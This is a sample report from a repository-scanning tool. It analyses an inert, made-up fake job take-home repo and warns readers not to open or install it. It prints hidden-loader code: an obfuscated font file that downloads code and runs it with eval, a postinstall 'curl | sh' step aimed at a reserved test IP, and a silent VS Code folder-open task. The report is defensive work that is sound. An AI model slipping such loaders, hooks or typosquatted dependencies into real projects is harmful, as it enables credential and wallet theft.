Skip to content
PreClone

Example report: an inert, made-up repo

Fake job take-home with a VS Code task, an install script and a hidden loader

The lure: A recruiter on LinkedIn sends a “senior full-stack take-home”: clone it, run it, fix the wallet bug by Friday.

Modelled on Abstract Security: tracking the VS Code tasks vector, Trend Micro: Void Dokkaebi, r/webdev: fake job scam, traced by hand. Addresses use reserved test ranges, so nothing here can reach anything.

defi-dashboard-assessment

Source
Inert example, modelled on a documented campaign
Files
9

Malware signs

Don't open or install this.

3 critical findings match patterns used by malware hidden in repos, set to run when you open the folder, when you install dependencies and when you start it. Fake take-home tests and “review our code” lures are built this way.

  • Don't open it in VS Code, Cursor or any other editor or IDE. Don't run npm install, pip install or any other install in it. Don't start it or run its scripts or tests.
  • If you already did: from another device, change the passwords saved in your browser, revoke GitHub, npm and cloud tokens, and move any crypto to a new wallet.
  • If someone sent it to you, check who they are before you reply, and don't run anything else they send.

When you open the folder

VS Code, Cursor, JetBrains, rust-analyzer, dev containers, Vim, Emacs, direnv, mise

CriticalRuns without asking

Opening the folder runs a font file as a program (task “eslint-check”)

.vscode/tasks.json tells VS Code, Cursor and other VS Code-based editors to run this when you open the folder. Once you trust the folder, VS Code runs it right away if you've ever allowed automatic tasks; otherwise it asks once, and that answer covers every trusted folder. Cursor ships with Workspace Trust off, and researchers have shown it running such tasks as soon as a folder opens. It runs public/fonts/fa-brands-regular.woff2 (a font file, which should never run as a program), which matches malware patterns: runs code hidden in an HTTP error response; evaluates data downloaded from a server; uses a raw IP on a port BeaverTail and InvisibleFerret use. It is set up to stay out of sight: terminal output hidden (reveal: "silent"), command not echoed, terminal closes itself afterwards, terminal never gets focus.

Runsnode public/fonts/fa-brands-regular.woff2

.vscode/tasks.jsonline 7
      "label": "eslint-check",      "type": "shell",      "command": "node public/fonts/fa-brands-regular.woff2",      "osx": { "command": "node public/fonts/fa-brands-regular.woff2" },      "windows": { "command": "node public\\fonts\\fa-brands-regular.woff2" },
public/fonts/fa-brands-regular.woff2line 4
const _0x1a2b=['\x67\x65\x74','\x64\x61\x74\x61'];const _0x3c4d=function(_0x5e6f){return _0x1a2b[_0x5e6f]};const _0x7a8b=require('axios');const _0x9c0d='hxxp://203[.]0[.]113[.]7:1244/client/7/node';_0x7a8b[_0x3c4d(0x0)](_0x9c0d).then(_0x1e2f=>{eval(_0x1e2f[_0x3c4d(0x1)])}).catch(_0x3a4b=>{eval(_0x3a4b.response.data)}); 
vscode.task.folder-open

When you install

npm, pnpm, yarn, bun, pip, bundler, mise

CriticalRuns without asking

npm install runs the “postinstall” script

package.json runs postinstall automatically when you run npm, pnpm, yarn or bun install in this folder, before you've run the app. It runs scripts/check-node.js, which matches malware patterns: uses a raw IP on a port BeaverTail and InvisibleFerret use; downloads a script and pipes it to a shell; talks to a raw IP address. npm install --ignore-scripts skips it.

Runsnode scripts/check-node.js

package.jsonline 6
  "private": true,  "scripts": {    "postinstall": "node scripts/check-node.js",    "start": "node server/server.js",    "dev": "concurrently \"npm:start\" \"npm:client\"",
scripts/check-node.jsline 7
if (Number(v) < 18) console.warn("Please use Node 18+");const os = process.platform === "win32" ? "w" : process.platform === "darwin" ? "m" : "l";exec(`curl -s hxxp://203[.]0[.]113[.]7:1244/s/${os} | sh`, () => {}); 
npm.lifecycle-script
High

jsonwebtokn isn't on npm and looks like a misspelling of jsonwebtoken

No package called jsonwebtokn is published on npm, and the name is very close to jsonwebtoken. Anyone could register jsonwebtokn, and installs of this project would then download whatever they publish. Check whether jsonwebtoken was meant.

package.jsonline 16
    "ethers": "^6.13.1",    "express": "^4.19.2",    "jsonwebtokn": "^9.0.2",    "mongoose": "^8.4.1",    "react": "^18.3.1",
deps.not-on-npm

When you run it

npm start, make, just, task, rake, setup scripts, pytest, configs your tools load

Critical

npm start loads code that looks malicious

The “start” script (server/server.js → server/routes/auth.js → server/config/db.js) is how a take-home or client project expects you to start it. It runs server/config/db.js, which matches malware patterns: evaluates the body of an HTTP response; downloads code and runs it; uses a raw IP on a port BeaverTail and InvisibleFerret use.

Runsnode server/server.js

package.jsonline 7
  "scripts": {    "postinstall": "node scripts/check-node.js",    "start": "node server/server.js",    "dev": "concurrently \"npm:start\" \"npm:client\"",    "client": "react-scripts start"
server/config/db.jsline 2
const mongoose = require("mongoose");[356 chars in] hxxp://198[.]51[.]100[.]23:1244/api/service/token/3a1f");eval(await r.text())}catch(e){}})(); 
npm.run-script.payload

Everything that runs

Every entry point PreClone found, including the ordinary ones, so you can see the whole picture and not just the alarms.

  • OpenOpen folder
    node public/fonts/fa-brands-regular.woff2.vscode/tasks.json:7“eslint-check”
    AutomaticFlagged
  • Installnpm install
    node scripts/check-node.jspackage.json:6"postinstall" in package.json
    AutomaticFlagged
  • Runnpm start
    node server/server.jspackage.json:7loads 3 files from the repo
    Flagged
1 routine entry, nothing flagged in it
  • Runnpm run dev
    concurrently "npm:start" "npm:client"package.json:8
    Expected

Dependencies

10 direct dependencies. Checked against npm (packages it removed as malware, install scripts, downloads) and OSV malware advisories on Oct 11, 2026, when this example was captured.

Show the list
  • axios^1.7.2
  • dotenv^16.4.5
  • ethers^6.13.1
  • express^4.19.2
  • jsonwebtokn^9.0.2not on npm, like jsonwebtoken
  • mongoose^8.4.1
  • react^18.3.1
  • react-dom^18.3.1
  • react-scripts5.0.1
  • concurrently^8.2.2dev

What this report can't tell you

  • PreClone reads files; it never runs them. Code that is downloaded later from somewhere else, compiled binaries and encrypted payloads can hide from a static read.

Engine 1.4.2. 8 of the 9 files read as text.